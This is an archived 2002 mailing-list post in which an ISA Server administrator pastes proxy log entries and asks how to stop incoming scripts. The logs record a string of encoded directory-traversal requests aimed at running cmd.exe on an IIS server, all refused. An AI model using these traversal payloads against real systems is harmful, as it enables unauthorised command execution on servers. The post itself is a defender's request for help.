ISA logs.

• From: Vinaykumar G <G.Vinay@xxxxxxxxx>
• To: isalist@xxxxxxxxxxxxx
• Date: Sun, 24 Feb 2002 19:44:43 -0800

Hi Jim,
       This is what iam getting in the ISA logs and I have denoted
xxx.xxx.xx.xx is pointing some valid IP on the Internet. Then if the IP is
valid one on the Internet then these scripts are coming from internet.
Please confirm as what has to be done to stop these scripts being executed.

xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:04
w3proxy ISA     -       www     -       -       -       145     3518    http
TCP     GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir -       -       401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:06
w3proxy ISA     -       www     -       -       -       97      3518    http
TCP     GET     http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:08
w3proxy ISA     -       www     -       -       -       97      3518    http
TCP     GET     http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
-       -       Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N       2002-02-23      05:57:08        w3proxy 
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:10
w3proxy ISA     -       www     -       -       -       97      3518    http
TCP     GET     http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
-       -       Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N       2002-02-23      05:57:11        w3proxy         anonymous
-       N       2002-02-23      05:57:11        w3proxy ISA     -       www
-       -       -       97      3518    http    TCP     GET
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       -
401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:13
w3proxy ISA     -       www     -       -       -       98      3518    http
TCP     GET     http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:15
w3proxy ISA     -       www     -       -       -       96      3518    http
TCP     GET     http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
-               
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:17
w3proxy ISA     -       www     -       -       -       100     3518    http
TCP     GET
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       -
401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:19
w3proxy ISA     -       www     -       -       -       96      3518    http
TCP     GET     http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -

Regards,
vinay.

Other related posts:

• » ISA logs.
• » Re: ISA logs.
• » Re: ISA logs.
• » Re: ISA logs.
• » ISA logs
• » RE: ISA logs
• » ISA logs
• » RE: ISA logs
• » RE: ISA logs
• » RE: ISA logs
• » Re: ISA logs

1. Home
2. isalist
3. Archive
4. 02-2002

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---